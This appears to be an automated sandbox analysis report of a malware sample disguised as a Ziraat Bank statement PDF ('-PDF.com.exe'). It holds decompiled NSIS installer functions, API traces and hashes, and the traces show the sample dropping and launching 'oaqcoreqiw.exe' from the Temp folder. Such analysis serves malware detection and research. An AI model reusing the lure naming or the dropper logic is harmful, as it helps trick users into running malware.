                                                  0x004031df
                                                  0x004031e5
                                                  0x004031ea
                                                  0x004031f0
                                                  0x00000000
                                                  0x00000000
                                                  0x004031fa
                                                  0x00403202
                                                  0x00403205
                                                  0x0040320a
                                                  0x0040320c
                                                  0x0040320c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004031fa
                                                  0x0040321e
                                                  0x00403224
                                                  0x00403230
                                                  0x00403230
                                                  0x00403233
                                                  0x00403239
                                                  0x00403239
                                                  0x00403241
                                                  0x00000000
                                                  0x00403241

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004030E4
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                                    • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                    • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-2584121061
                                                  • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                  • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                  • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                  • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                  C-Code - Quality: 77%
                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\FRONTD~1\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\FRONTD~1\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                  0x0040176f
                                                  0x00401776
                                                  0x00401782
                                                  0x00401785
                                                  0x0040178a
                                                  0x0040178d
                                                  0x00401794
                                                  0x004017b0
                                                  0x00401796
                                                  0x00401797
                                                  0x00401797
                                                  0x004017b6
                                                  0x004017bb
                                                  0x004017bb
                                                  0x004017bf
                                                  0x004017c2
                                                  0x004017c7
                                                  0x004017c9
                                                  0x004017cb
                                                  0x004017d0
                                                  0x004017d0
                                                  0x004017db
                                                  0x004017db
                                                  0x004017ec
                                                  0x004017ee
                                                  0x004017ee
                                                  0x004017ef
                                                  0x004017ef
                                                  0x004017f2
                                                  0x004017f5
                                                  0x004017f8
                                                  0x004017f8
                                                  0x004017ff
                                                  0x0040180e
                                                  0x00401813
                                                  0x00401816
                                                  0x00401819
                                                  0x00000000
                                                  0x00000000
                                                  0x0040181b
                                                  0x0040181e
                                                  0x00401874
                                                  0x00401879
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x00402c2d
                                                  0x00000000
                                                  0x00401820
                                                  0x00401826
                                                  0x0040182d
                                                  0x0040183a
                                                  0x00401845
                                                  0x0040185b
                                                  0x0040185b
                                                  0x0040185e
                                                  0x00000000
                                                  0x00401864
                                                  0x00401864
                                                  0x00401865
                                                  0x00401882
                                                  0x00402c33
                                                  0x00402c33
                                                  0x00402c33
                                                  0x00401867
                                                  0x00401867
                                                  0x00401868
                                                  0x00401493
                                                  0x0040239d
                                                  0x0040239d
                                                  0x0040239d
                                                  0x00401865
                                                  0x0040185e
                                                  0x00402c35
                                                  0x00402c39
                                                  0x00402c39
                                                  0x00401892
                                                  0x00401897
                                                  0x004018a5
                                                  0x004018aa
                                                  0x004018b0
                                                  0x004018b4
                                                  0x004018b6
                                                  0x004018be
                                                  0x004018ca
                                                  0x004018b8
                                                  0x004018b8
                                                  0x004018bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004018bc
                                                  0x004018d3
                                                  0x004018d9
                                                  0x004018db
                                                  0x00000000
                                                  0x004018e1
                                                  0x004018e1
                                                  0x004018e4
                                                  0x004018fc
                                                  0x004018e6
                                                  0x004018e9
                                                  0x004018f2
                                                  0x004018f2
                                                  0x00401901
                                                  0x00401906
                                                  0x00402398
                                                  0x00000000
                                                  0x00402398
                                                  0x00000000

                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,C:\Users\user~1\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp
                                                  • API String ID: 1941528284-3466564555
                                                  • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                  • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                  • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                  • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 530 4069ff-406a32 wsprintfW LoadLibraryExW 528->530 529->528 531 4069f8-4069fa 529->531 531->530
                                                  C-Code - Quality: 100%
                                                  			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                  0x004069dc
                                                  0x004069e5
                                                  0x004069e7
                                                  0x004069e7
                                                  0x004069eb
                                                  0x004069fe
                                                  0x004069f8
                                                  0x004069f8
                                                  0x004069f8
                                                  0x00406a17
                                                  0x00406a2b
                                                  0x00406a32

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                  • wsprintfW.USER32 ref: 00406A17
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                  • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                  • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                  • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                  C-Code - Quality: 100%
                                                  			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                  0x00405ba4
                                                  0x00405ba8
                                                  0x00405bab
                                                  0x00405bb1
                                                  0x00405bb5
                                                  0x00405bb9
                                                  0x00405bc1
                                                  0x00405bc8
                                                  0x00405bce
                                                  0x00405bd5
                                                  0x00405bdc
                                                  0x00405be4
                                                  0x00405be6
                                                  0x00000000
                                                  0x00405be6
                                                  0x00405bf0
                                                  0x00405bf7
                                                  0x00405c0d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c0f
                                                  0x00405c13

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BDC
                                                  • GetLastError.KERNEL32 ref: 00405BF0
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                  • GetLastError.KERNEL32 ref: 00405C0F
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405BBF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 3449924974-2382934351
                                                  • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                  • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                  • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                  • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                  C-Code - Quality: 100%
                                                  			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                  0x0040618d
                                                  0x00406193
                                                  0x00406194
                                                  0x00406194
                                                  0x00406199
                                                  0x0040619a
                                                  0x0040619d
                                                  0x004061a2
                                                  0x004061a5
                                                  0x004061af
                                                  0x004061bc
                                                  0x004061c0
                                                  0x004061c8
                                                  0x00000000
                                                  0x00000000
                                                  0x004061cc
                                                  0x00000000
                                                  0x004061ce
                                                  0x004061ce
                                                  0x004061ce
                                                  0x004061d1
                                                  0x004061d4
                                                  0x004061d4
                                                  0x004061d7
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004061A5
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 004061C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3083371207
                                                  • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                  • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                  • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                  • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                  C-Code - Quality: 100%
                                                  			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsqD5A.tmp\\", 7); // executed
				return _t4;
			}







                                                  0x00403c25
                                                  0x00403c34
                                                  0x00403c37
                                                  0x00403c39
                                                  0x00403c39
                                                  0x00403c40
                                                  0x00403c48
                                                  0x00403c4b
                                                  0x00403c4d
                                                  0x00403c4d
                                                  0x00403c4d
                                                  0x00403c54
                                                  0x00403c60
                                                  0x00403c66

                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403C2A
                                                  • C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\, xrefs: 00403C5B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
